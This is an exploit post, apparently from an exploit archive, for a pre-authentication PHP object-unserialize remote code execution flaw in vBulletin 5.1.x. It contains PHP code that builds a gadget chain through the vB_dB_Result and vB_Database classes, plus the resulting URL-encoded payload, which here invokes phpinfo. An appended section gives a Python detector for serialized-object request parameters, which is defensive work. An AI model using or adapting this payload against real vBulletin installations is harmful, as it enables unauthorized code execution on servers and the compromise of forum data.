Vbulletin 5.1.X Unserialize Preauth RCE Exploit

2015.11.09
Credit: 4TT4CK3R
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
~# : Exploit Title: Vbulletin 5.1.X Unserialize Preauth RCE Exploit
~# : Date: 2015/11/04
~# : Exploit Author: 4TT4CK3R
~# : Vendor Homepage: http://www.vbulletin.com
~# : Version: 5.1.x
~# : Google Dork : No
~# : Tested on: Kali Linux , Windows 7 , Mozilla Firefox
~# : Build the object !!
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

php << 'eof'
<?php
class vB_Database {
    public $functions = array();
    public function __construct() {
        $this->functions['free_result'] = 'phpinfo';
    }
}
class vB_dB_Result {
    protected $db;
    protected $recordset;
    public function __construct() {
        $this->db = new vB_Database();
        $this->recordset = 1;
    }
}
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof

O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
~# : Discovered by : 4TT4CK3R
~# : Special Thanks : amin0461
~# : Thanks for my BlackHat Friends !!
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
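For detection, the URL-encoded value above decodes to a PHP serialized object whose headers name the classes vB_dB_Result and vB_Database. The following is an added example, not part of the original advisory or of vBulletin: it flags request parameters carrying serialized-object headers, generalized to any class name and to double URL-encoding. The request paths, the parameter names and the helper names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

# PHP serialized object header: O:<name length>:"<class>":<count>:{  (C: = Serializable)
OBJECT_RE = re.compile(r'[OC]:(\d+):"([^"]+)":\d+:\{')
WATCHED = {"vB_dB_Result", "vB_Database"}  # class names taken from the PoC on this page
MAX_DECODE_ROUNDS = 3                      # assumption: bound on nested URL-encoding

def fully_decode(value):
    """Undo repeated percent-encoding so double-encoded values are still inspected."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def serialized_classes(value):
    """Class names from object headers whose declared length matches the name."""
    found = []
    for m in OBJECT_RE.finditer(fully_decode(value)):
        name = m.group(2)
        if int(m.group(1)) == len(name.encode("utf-8")):
            found.append(name)
    return found

def inspect_target(target):
    """Return [(param, classes, watched_hit)] for one request target."""
    findings = []
    for param, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        classes = serialized_classes(value)
        if classes:
            findings.append((param, classes, bool(WATCHED & set(classes))))
    return findings

# Constructed sample input: a cut-down object with the same class nesting as the PoC.
_OBJ = 'O:12:"vB_dB_Result":1:{s:5:"\x00*\x00db";O:11:"vB_Database":0:{}}'
SAMPLE_TARGETS = [
    "/constructed/path?data=" + quote(_OBJ, safe=""),                  # encoded once
    "/constructed/path?data=" + quote(quote(_OBJ, safe=""), safe=""),  # encoded twice
    "/constructed/path?q=O%3A+hello&page=2",                           # benign lookalike
    "/constructed/path?data=" + quote('O:8:"stdClass":0:{}', safe=""), # other class
]

if __name__ == "__main__":
    for t in SAMPLE_TARGETS:
        print(inspect_target(t) or "clean", "<-", t[:60])
```

Any hit is worth reviewing on an endpoint that is not expected to receive serialized PHP data. The watched flag only marks the two class names shown on this page.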

